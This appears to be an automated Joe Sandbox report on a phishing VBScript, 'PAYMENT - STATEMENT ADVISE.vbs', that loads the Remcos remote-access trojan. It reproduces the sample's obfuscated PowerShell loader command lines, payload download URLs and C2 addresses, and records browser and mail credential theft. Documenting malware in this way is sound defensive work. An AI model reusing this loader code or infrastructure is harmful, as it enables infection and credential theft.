Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. 
skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. 
skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. 
skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. 
skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sremlJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2933 cpuid 8_2_240C2933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_240C2264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 13_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041739B GetVersionExW, 11_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match, File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 13_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 13_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 13_2_00402DB3
Source: Yara match, File source: Process Memory Space: wab.exe PID: 5652, type: MEMORYSTR

                Remote Access Functionality

Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
Source: Yara match, File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Mitre Att&ck Matrix (numbers in parentheses are the counts shown beside the technique in the matrix)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (221) | Valid Accounts | Windows Management Instrumentation (1) | Scripting (221) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (11) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (11) | DLL Side-Loading (1) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Input Capture (11) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Logon Script (Windows) | Process Injection (211) | Software Packing (1) | Credentials in Registry (2) | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (212) | Login Hook | Login Hook | DLL Side-Loading (1) | Credentials In Files (1) | System Information Discovery (129) | Distributed Component Object Model | Input Capture (11) | Remote Access Software (1) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | PowerShell (2) | Network Logon Script | Network Logon Script | Masquerading (1) | LSA Secrets | Security Software Discovery (131) | SSH | Clipboard Data (2) | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (21) | Cached Domain Credentials | Virtualization/Sandbox Evasion (21) | VNC | GUI Input Capture | Application Layer Protocol (112) | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Access Token Manipulation (1) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (211) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1467964, Sample: PAYMENT - STATEMENT ADVISE.vbs, Startdate: 05/07/2024, Architecture: WINDOWS, Score: 100

Process tree (reconstructed from the behavior graph):
- Start: DNS geoplugin.net; signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
  - wscript.exe: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
    - powershell.exe: network 103.237.86.247 (ports 49705, 64544, 80; BGNR-AP2BainandCompanySG, unknown); signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
      - powershell.exe: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
        - wab.exe: network 103.237.87.32 (ports 1999, 64545, 64546; BGNR-AP2BainandCompanySG, unknown); geoplugin.net 178.237.33.50 (ports 64547, 80; ATOM86-ASATOM86NL, Netherlands); dropped C:\ProgramData\remcos\logs.dat (data); signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
          - wab.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
          - wab.exe: Tries to harvest and steal browser information (history, passwords, etc)
          - wab.exe
          - wab.exe
        - cmd.exe
      - conhost.exe
      - cmd.exe

Source | Detection | Scanner | Label | Link
PAYMENT - STATEMENT ADVISE.vbs | 38% | ReversingLabs | Script-WScript.Trojan.GuLoader |
PAYMENT - STATEMENT ADVISE.vbs | 14% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
geoplugin.net | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://103.237.86.247/mtyozjDM72.bin | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
103.237.87.32 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://103.237.86.247/acidizes.mso | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
103.237.86.247 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | false
103.237.87.32 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467964
Start date and time: 2024-07-05 07:12:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PAYMENT - STATEMENT ADVISE.vbs
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winVBS@20/13@1/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 190
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172
